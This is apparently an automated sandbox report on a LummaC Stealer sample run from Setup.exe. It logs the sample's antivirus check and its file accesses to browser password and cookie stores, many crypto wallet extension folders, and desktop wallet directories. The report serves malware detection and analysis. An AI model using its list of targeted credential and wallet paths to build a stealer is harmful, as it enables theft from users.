Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00406805

Source: Amcache.hve.13.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
